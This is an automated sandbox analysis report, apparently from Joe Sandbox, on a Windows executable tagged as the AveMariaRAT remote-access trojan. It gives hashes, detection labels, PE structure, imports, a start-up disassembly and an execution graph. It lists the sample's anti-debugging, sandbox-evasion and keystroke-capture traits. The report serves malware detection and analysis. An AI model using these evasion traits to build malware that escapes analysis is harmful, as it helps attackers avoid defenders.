Windows Analysis Report
DocumentoSENAMHI20222103.exe

Overview

General Information

Sample Name:DocumentoSENAMHI20222103.exe
Analysis ID:593268
MD5:81ba3d2de48272d692c4e6604e6b1db9
SHA1:921e7008881d5e0e9a788ee310ddef60b343c647
SHA256:eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
Tags:AveMariaRAT, exe, RAT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Initial sample is a PE file and has a suspicious name
Found potential dummy code loops (likely to delay analysis)
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found large amount of non-executed APIs
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)

Classification

  • System is w10x64
  • DocumentoSENAMHI20222103.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe" MD5: 81BA3D2DE48272D692C4E6604E6B1DB9)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched

AV Detection

Source: DocumentoSENAMHI20222103.exe | ReversingLabs: Detection: 16%
Source: 0.2.DocumentoSENAMHI20222103.exe.150000.0.unpack | Avira: Label: ADWARE/Adware.Gen8
Source: 0.0.DocumentoSENAMHI20222103.exe.150000.0.unpack | Avira: Label: ADWARE/Adware.Gen8
Source: DocumentoSENAMHI20222103.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DocumentoSENAMHI20222103.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_0015A22B FindFirstFileExW, 0_2_0015A22B
Source: DocumentoSENAMHI20222103.exe, 00000000.00000002.923038668.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: initial sample | Static PE information: Filename: DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DocumentoSENAMHI20222103.exe, 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe | Binary or memory string: OriginalFilenameMultiRead.EXEB vs DocumentoSENAMHI20222103.exe
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_0015FA9C 0_2_0015FA9C
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: String function: 00154730 appears 34 times
Source: DocumentoSENAMHI20222103.exe | ReversingLabs: Detection: 16%
Source: DocumentoSENAMHI20222103.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00151B39 __EH_prolog3_catch_GS,__alloca_probe_16,LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary, 0_2_00151B39
Source: classification engine | Classification label: mal56.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001514A2 CoCreateInstance, 0_2_001514A2
Source: DocumentoSENAMHI20222103.exe | Static file information: File size 1320960 > 1048576
Source: DocumentoSENAMHI20222103.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DocumentoSENAMHI20222103.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: DocumentoSENAMHI20222103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: DocumentoSENAMHI20222103.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DocumentoSENAMHI20222103.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DocumentoSENAMHI20222103.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DocumentoSENAMHI20222103.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DocumentoSENAMHI20222103.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001601B1 push ecx; ret 0_2_001601C4
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | API coverage: 3.6 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001571A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 0_2_001571A3
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_0015A22B FindFirstFileExW, 0_2_0015A22B

Anti Debugging

Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Process Stats: CPU usage > 90% for more than 60s
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00154959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00154959
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00157B8E mov eax, dword ptr fs:[00000030h] 0_2_00157B8E
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00159DF6 mov eax, dword ptr fs:[00000030h] 0_2_00159DF6
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001571A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C 0_2_001571A3
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_0015B2B8 GetProcessHeap, 0_2_0015B2B8
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00154AEF SetUnhandledExceptionFilter, 0_2_00154AEF
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00154959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00154959
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001542DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_001542DA
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_001572E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_001572E0
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00154775 cpuid 0_2_00154775
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe | Code function: 0_2_00154BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00154BDE

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 11 Virtualization/Sandbox Evasion | LSASS Memory | 12 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings

Source | Detection | Scanner | Label | Link
DocumentoSENAMHI20222103.exe | 17% | ReversingLabs | Win32.Trojan.Woreflint |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
0.2.DocumentoSENAMHI20222103.exe.150000.0.unpack | 100% | Avira | ADWARE/Adware.Gen8 |  | Download File
0.0.DocumentoSENAMHI20222103.exe.150000.0.unpack | 100% | Avira | ADWARE/Adware.Gen8 |  | Download File
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:593268
Start date and time:2022-03-21 13:31:54 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 41s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:DocumentoSENAMHI20222103.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.evad.winEXE@1/0@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 91.6%)
  • Quality average: 76.6%
  • Quality standard deviation: 31.6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 8
  • Number of non-executed functions: 49
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Override analysis time to 240s for sample files taking high CPU consumption
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
No simulations
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):2.7480998924776148
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:DocumentoSENAMHI20222103.exe
File size:1320960
MD5:81ba3d2de48272d692c4e6604e6b1db9
SHA1:921e7008881d5e0e9a788ee310ddef60b343c647
SHA256:eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
SHA512:f53f5aef705bbce8ba6c8d7013425b274ca74b562a832fa9986a7000d14a8bf163869db503e8d6682c4773dea9ddd67fc8ad1a9a78f7a3e98309c9ba540ec89a
SSDEEP:6144:aNk8vti3OqUP1bq00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+e:Ak8l7D4pa7+ocZ
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V\-..=C..=C..=C..V@..=C..VF..=C.pEG..=C.pE@..=C.pEF.#=C..VE..=C..VG..=C..VB..=C..=B..=C..DJ..=C..D...=C..=...=C..DA..=C.Rich.=C
Icon Hash:00828e8e8686b000
Entrypoint:0x404718
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x6237B381 [Sun Mar 20 23:06:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:5ed77736e49da7d22b203d8d8f918a6b
Instruction
call 00007FFA949C4013h
jmp 00007FFA949C397Fh
retn 0000h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00405570h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00419008h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [00542724h], 00000000h
sub esp, 24h
or dword ptr [00419010h], 01h
push 0000000Ah
call dword ptr [0041122Ch]
test eax, eax
je 00007FFA949C3CB2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x174a0 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x143000 | 0xd28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x144000 | 0x12dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16380 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x162c0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xf9cd | 0xfa00 | False | 0.605875 | data | 6.61019563742 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x11000 | 0x7322 | 0x7400 | False | 0.416386045259 | data | 4.90923942869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x129e78 | 0x129400 | False | 0.133941830057 | data | 2.29312173446 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x143000 | 0xd28 | 0xe00 | False | 0.339006696429 | data | 3.85073462575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x144000 | 0x12dc | 0x1400 | False | 0.7365234375 | data | 6.39751442919 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
REGISTRY | 0x1434d0 | 0xaa | ASCII text | English | United States
TYPELIB | 0x1436a0 | 0x4d0 | data | English | United States
RT_DIALOG | 0x143580 | 0x11a | data | English | United States
RT_STRING | 0x143b70 | 0x32 | data | English | United States
RT_VERSION | 0x1431f0 | 0x2dc | data | English | United States
RT_MANIFEST | 0x143ba8 | 0x17d | XML 1.0 document text | English | United States

DLL | Import
KERNEL32.dll | DecodePointer, DeleteCriticalSection, GetTickCount, AcquireSRWLockExclusive, AssignProcessToJobObject, CompareStringW, ConnectNamedPipe, CreateDirectoryW, CreateEventW, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateJobObjectW, CreateMutexW, CreateNamedPipeW, CreateProcessW, CreateRemoteThread, CreateSemaphoreW, DebugBreak, DeleteFileW, DisconnectNamedPipe, DuplicateHandle, EncodePointer, EnterCriticalSection, EnumSystemLocalesEx, EnumSystemLocalesW, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetDateFormatW, GetDriveTypeW, GetEnvironmentStringsW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, CreateThread, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHandleCount, GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetModuleFileNameA, SizeofResource, VirtualProtect, SetLastError, VirtualAlloc, LoadLibraryExA, LeaveCriticalSection, FindResourceA, Sleep, IsDBCSLeadByte, LoadResource, WideCharToMultiByte, lstrcmpiA, GetConsoleOutputCP, SetFilePointerEx, SetStdHandle, IsValidCodePage, HeapReAlloc, HeapSize, LCMapStringW, WriteFile, VirtualQuery, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RaiseException, CloseHandle, GetLastError, MultiByteToWideChar, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, RtlUnwind, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetProcessHeap, HeapFree, IsDebuggerPresent, OutputDebugStringW, HeapAlloc, WriteConsoleW
USER32.dll | CharNextA, MessageBoxA
ADVAPI32.dll | RegQueryInfoKeyW, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegDeleteValueA, RegEnumKeyExA, RegCloseKey
ole32.dll | CoCreateInstance, CoTaskMemFree, CoTaskMemRealloc, CoTaskMemAlloc
OLEAUT32.dll | VarUI4FromStr

Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | MultiRead
FileVersion | 1, 0, 0, 1
ProductName | MultiRead Module
ProductVersion | 1, 0, 0, 1
FileDescription | MultiRead Module
OriginalFilename | MultiRead.EXE
Translation | 0x0409 0x04b0

Language of compilation system | Country where language is spoken | Map
English | United States |

No network behavior found

Target ID:0
Start time:14:33:05
Start date:21/03/2022
Path:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
Imagebase:0x150000
File size:1320960 bytes
MD5 hash:81BA3D2DE48272D692C4E6604E6B1DB9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

    Execution Graph

    Execution Coverage:1.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:1.4%
    Total number of Nodes:859
    Total number of Limit Nodes:15
8841->8842 8844 15bc14 8841->8844 8842->8844 8843 15bc26 8846 15bc38 8843->8846 8848 158b82 _free 13 API calls 8843->8848 8844->8843 8845 158b82 _free 13 API calls 8844->8845 8845->8843 8847 15bc4a 8846->8847 8849 158b82 _free 13 API calls 8846->8849 8850 15bc5c 8847->8850 8851 158b82 _free 13 API calls 8847->8851 8848->8846 8849->8847 8852 15bc6e 8850->8852 8853 158b82 _free 13 API calls 8850->8853 8851->8850 8854 15bc80 8852->8854 8856 158b82 _free 13 API calls 8852->8856 8853->8852 8855 15bc92 8854->8855 8857 158b82 _free 13 API calls 8854->8857 8858 158b82 _free 13 API calls 8855->8858 8855->8859 8856->8854 8857->8855 8858->8859 8859->8809 8861 15bcb5 8860->8861 8871 15bd0d 8860->8871 8862 158b82 _free 13 API calls 8861->8862 8866 15bcc5 8861->8866 8862->8866 8863 158b82 _free 13 API calls 8864 15bcd7 8863->8864 8865 15bce9 8864->8865 8867 158b82 _free 13 API calls 8864->8867 8868 15bcfb 8865->8868 8869 158b82 _free 13 API calls 8865->8869 8866->8863 8866->8864 8867->8865 8870 158b82 _free 13 API calls 8868->8870 8868->8871 8869->8868 8870->8871 8871->8812 8873 15c18e 8872->8873 8874 15c16f 8872->8874 8873->8827 8874->8873 8875 15bd49 _unexpected 13 API calls 8874->8875 8876 15c188 8875->8876 8877 158b82 _free 13 API calls 8876->8877 8877->8873 8878->8803 8880 1590a4 _unexpected 35 API calls 8879->8880 8881 15adc5 8880->8881 8882 15acd3 __fassign 35 API calls 8881->8882 8883 15adcb 8882->8883 8883->8781 8885 15aa67 GetCPInfo 8884->8885 8886 15ab30 8884->8886 8885->8886 8891 15aa7f 8885->8891 8887 15403c _ValidateLocalCookies 5 API calls 8886->8887 8888 15abbd 8887->8888 8888->8748 8895 15be51 8891->8895 8894 15d34e 38 API calls 8894->8886 8896 1570e3 __fassign 35 API calls 8895->8896 8897 15be71 8896->8897 8915 15b0ca 8897->8915 8899 15bf2f 8900 15403c _ValidateLocalCookies 5 API calls 8899->8900 8903 15aae7 8900->8903 8901 15be9e 8901->8899 8902 158bbc 14 API calls 8901->8902 8906 15bec4 CallUnexpected __alloca_probe_16 8901->8906 8902->8906 8910 15d34e 
8903->8910 8904 15bf29 8918 15bf54 8904->8918 8906->8904 8907 15b0ca __fassign MultiByteToWideChar 8906->8907 8908 15bf12 8907->8908 8908->8904 8909 15bf19 GetStringTypeW 8908->8909 8909->8904 8911 1570e3 __fassign 35 API calls 8910->8911 8912 15d361 8911->8912 8922 15d164 8912->8922 8916 15b0db MultiByteToWideChar 8915->8916 8916->8901 8919 15bf60 8918->8919 8920 15bf71 8918->8920 8919->8920 8921 158b82 _free 13 API calls 8919->8921 8920->8899 8921->8920 8923 15d17f 8922->8923 8924 15b0ca __fassign MultiByteToWideChar 8923->8924 8928 15d1c3 8924->8928 8925 15d328 8926 15403c _ValidateLocalCookies 5 API calls 8925->8926 8927 15ab08 8926->8927 8927->8894 8928->8925 8929 158bbc 14 API calls 8928->8929 8933 15d1e8 __alloca_probe_16 8928->8933 8929->8933 8930 15d28d 8932 15bf54 __freea 13 API calls 8930->8932 8931 15b0ca __fassign MultiByteToWideChar 8934 15d22e 8931->8934 8932->8925 8933->8930 8933->8931 8934->8930 8948 1599ea 8934->8948 8937 15d264 8937->8930 8939 1599ea 5 API calls 8937->8939 8938 15d29c 8941 158bbc 14 API calls 8938->8941 8944 15d2ae __alloca_probe_16 8938->8944 8939->8930 8940 15d319 8943 15bf54 __freea 13 API calls 8940->8943 8941->8944 8942 1599ea 5 API calls 8945 15d2f6 ___scrt_uninitialize_crt 8942->8945 8943->8930 8944->8940 8944->8942 8945->8940 8946 15d345 8945->8946 8947 15bf54 __freea 13 API calls 8946->8947 8947->8930 8954 1596c3 8948->8954 8952 159a3b LCMapStringW 8953 1599fb 8952->8953 8953->8930 8953->8937 8953->8938 8955 1597be _unexpected 4 API calls 8954->8955 8956 1596d9 8955->8956 8956->8953 8957 159a47 8956->8957 8960 1596dd 8957->8960 8959 159a52 8959->8952 8961 1597be _unexpected LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8960->8961 8962 1596f3 8961->8962 8962->8959 8963->8757 8974 15afc1 8964->8974 8966 15a8ca 8967 15afc1 24 API calls 8966->8967 8968 15a8e9 8967->8968 8969 15a87e 8968->8969 8970 158b82 _free 13 API calls 8968->8970 8971 15a89c 8969->8971 8970->8969 8988 159ddf LeaveCriticalSection 8971->8988 8973 
15a88a 8973->8624 8975 15afd2 8974->8975 8984 15afce __InternalCxxFrameHandler 8974->8984 8976 15afd9 8975->8976 8980 15afec CallUnexpected 8975->8980 8977 1575d4 _free 13 API calls 8976->8977 8978 15afde 8977->8978 8979 15748c ___std_exception_copy 24 API calls 8978->8979 8979->8984 8981 15b023 8980->8981 8982 15b01a 8980->8982 8980->8984 8981->8984 8986 1575d4 _free 13 API calls 8981->8986 8983 1575d4 _free 13 API calls 8982->8983 8985 15b01f 8983->8985 8984->8966 8987 15748c ___std_exception_copy 24 API calls 8985->8987 8986->8985 8987->8984 8988->8973 8990 1570e3 __fassign 35 API calls 8989->8990 8991 15b056 8990->8991 8991->8269 8993 153b3c CreateThread 8992->8993 8994 153b50 8993->8994 8994->8993 8996 153b6a 8994->8996 8995 153b74 MessageBoxA 8995->8995 8995->8996 8996->8995 8997 153b8e 8996->8997 8998 153b93 MessageBoxA 8997->8998 8998->8998 8999 153bb7 8998->8999 9000 153bd0 Sleep 8999->9000 9000->9000 9319 151000 9320 151012 CallUnexpected 9319->9320 9325 1510c5 InitializeCriticalSectionEx 9320->9325 9326 1510d5 GetLastError 9325->9326 9327 151034 9325->9327 9326->9327 9328 15428b 9327->9328 9331 15425e 9328->9331 9332 154274 9331->9332 9333 15426d 9331->9333 9340 1584fb 9332->9340 9337 15848f 9333->9337 9336 151061 9338 1584fb 27 API calls 9337->9338 9339 1584a1 9338->9339 9339->9336 9343 158231 9340->9343 9344 15823d ___scrt_is_nonwritable_in_current_image 9343->9344 9351 159d97 EnterCriticalSection 9344->9351 9346 15824b 9352 15828c 9346->9352 9348 158258 9362 158280 9348->9362 9351->9346 9353 1582a8 9352->9353 9355 15831f _unexpected 9352->9355 9354 1582ff 9353->9354 9353->9355 9365 157273 9353->9365 9354->9355 9357 157273 27 API calls 9354->9357 9355->9348 9359 158315 9357->9359 9358 1582f5 9360 158b82 _free 13 API calls 9358->9360 9361 158b82 _free 13 API calls 9359->9361 9360->9354 9361->9355 9393 159ddf LeaveCriticalSection 9362->9393 9364 158269 9364->9336 9366 157280 9365->9366 9367 15729b 9365->9367 9366->9367 9368 15728c 9366->9368 9369 1572aa 
